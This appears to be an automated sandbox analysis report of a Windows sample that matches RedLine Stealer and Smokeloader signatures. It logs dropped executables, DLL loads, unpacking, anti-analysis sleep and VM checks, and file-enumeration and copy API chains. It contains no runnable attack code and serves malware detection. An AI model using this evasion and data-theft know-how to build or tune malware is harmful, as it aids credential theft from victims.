                  Source: GK059kPZ5B.exe | Binary or memory string: OriginalFileName vs GK059kPZ5B.exe
                  Source: GK059kPZ5B.exe, 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs GK059kPZ5B.exe
                  Source: GK059kPZ5B.exe, 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs GK059kPZ5B.exe
                  Source: GK059kPZ5B.exe, 00000000.00000003.2133255224.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs GK059kPZ5B.exe
                  Source: GK059kPZ5B.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000002.4555377117.0000000000869000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000002.00000002.3069360956.0000000000849000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: GK059kPZ5B.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: A865.tmp.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engine | Classification label: mal100.troj.evad.winEXE@4/7@1/3
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00869ED6 CreateToolhelp32Snapshot,Module32First, 0_2_00869ED6
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 2_2_00413720
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\track_prt[1].htm
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Mutant created: \Sessions\1\BaseNamedObjects\48rt8k8rt4rwe5rb
                  Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3640
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | File created: C:\Users\user\AppData\Local\Temp\A865.tmp
                  Source: GK059kPZ5B.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: GK059kPZ5B.exe | ReversingLabs: Detection: 50%
                  Source: unknown | Process created: C:\Users\user\Desktop\GK059kPZ5B.exe "C:\Users\user\Desktop\GK059kPZ5B.exe"
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Process created: C:\Users\user\AppData\Local\Temp\A865.tmp.exe "C:\Users\user\AppData\Local\Temp\A865.tmp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3640 -s 1324
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Process created: C:\Users\user\AppData\Local\Temp\A865.tmp.exe "C:\Users\user\AppData\Local\Temp\A865.tmp.exe"
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: msimg32.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: msvcr100.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: schannel.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: ntasn1.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: ncrypt.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: propsys.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: edputil.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: appresolver.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: bcp47langs.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: slc.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: sppc.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: pcacli.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: mpr.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Section loaded: sfc_os.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: msimg32.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: msvcr100.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: rstrtmgr.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

                  Data Obfuscation

                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Unpacked PE file: 2.2.A865.tmp.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Unpacked PE file: 0.2.GK059kPZ5B.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Unpacked PE file: 2.2.A865.tmp.exe.400000.1.unpack
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_0041EC7E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0041EC7E
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00410786 push ecx; ret 0_2_00410799
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_0040FDB1 push ecx; ret 0_2_0040FDC4
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_0086F0F7 pushad ; ret 0_2_0086F113
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_0086B1FE push E8665AC8h; iretd 0_2_0086B203
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_0086F275 push ecx; ret 0_2_0086F292
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_0086D7B9 push FFFFFFADh; ret 0_2_0086D82B
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_0086CAEC push 00000003h; ret 0_2_0086CAF0
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_0086AD23 push es; iretd 0_2_0086AD34
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A60018 push ecx; ret 0_2_00A6002B
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A879BF push esp; retf 0_2_00A879C7
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A609ED push ecx; ret 0_2_00A60A00
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A89E08 pushad ; retf 0_2_00A89E0F
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A87FBD push esp; retf 0_2_00A87FBE
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_0041B035 push ecx; ret 2_2_0041B048
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_0040020D pushfd ; iretd 2_2_00400211
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_0084E80A push eax; ret 2_2_0084E819
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_0084B82B push 7DD07DC0h; iretd 2_2_0084B83C
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_0084AD25 pushfd ; iretd 2_2_0084AD28
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_0084E7FB push eax; ret 2_2_0084E819
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_0084972C push esp; iretd 2_2_0084972D
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022EB29C push ecx; ret 2_2_022EB2AF
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022D0F59 pushfd ; iretd 2_2_022D1078
                  Source: GK059kPZ5B.exe | Static PE information: section name: .text entropy: 7.663584602800402
                  Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: section name: .text entropy: 7.481613035763361
                  Source: A865.tmp.exe.0.dr | Static PE information: section name: .text entropy: 7.481613035763361
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | File created: C:\Users\user\AppData\Local\Temp\A865.tmp.exe
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_0040E999 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0040E999
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_2-26375
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe Window / User API: threadDelayed 510
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe Window / User API: threadDelayed 9481
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeEvaded block: after key decisiongraph_2-27536
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-65274
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeAPI coverage: 5.1 %
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI coverage: 6.5 %
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe TID: 3220 Thread sleep count: 510 > 30
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe TID: 3220 Thread sleep time: -362610s >= -30000s
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe TID: 3220 Thread sleep count: 9481 > 30
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe TID: 3220 Thread sleep time: -6740991s >= -30000s
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00438A12 FindFirstFileExW,0_2_00438A12
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A88C79 FindFirstFileExW,0_2_00A88C79
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040E430
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_004138B0
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00414570
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00414910
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_0040ED20
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_0040BE70
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040DE10
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_004016D0
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040DA80
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00413EA0
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040F6B0
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_022DE697
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022E3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_022E3B17
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022E4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_022E4B77
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_022DEF87
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022E47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,2_2_022E47D7
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_022DE077
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_022DDCE7
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DF8F1 FindFirstFileA,2_2_022DF8F1
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_022DC0D7
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022D1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_022D1937
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022E4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_022E4107
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022DF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_022DF917
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00401160 GetSystemInfo,ExitProcess,2_2_00401160
                  Source: Amcache.hve.5.drBinary or memory string: VMware
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, A865.tmp.exe, 00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmp, A865.tmp.exe, 00000002.00000002.3069391688.00000000008C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                  Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: A865.tmp.exe, 00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
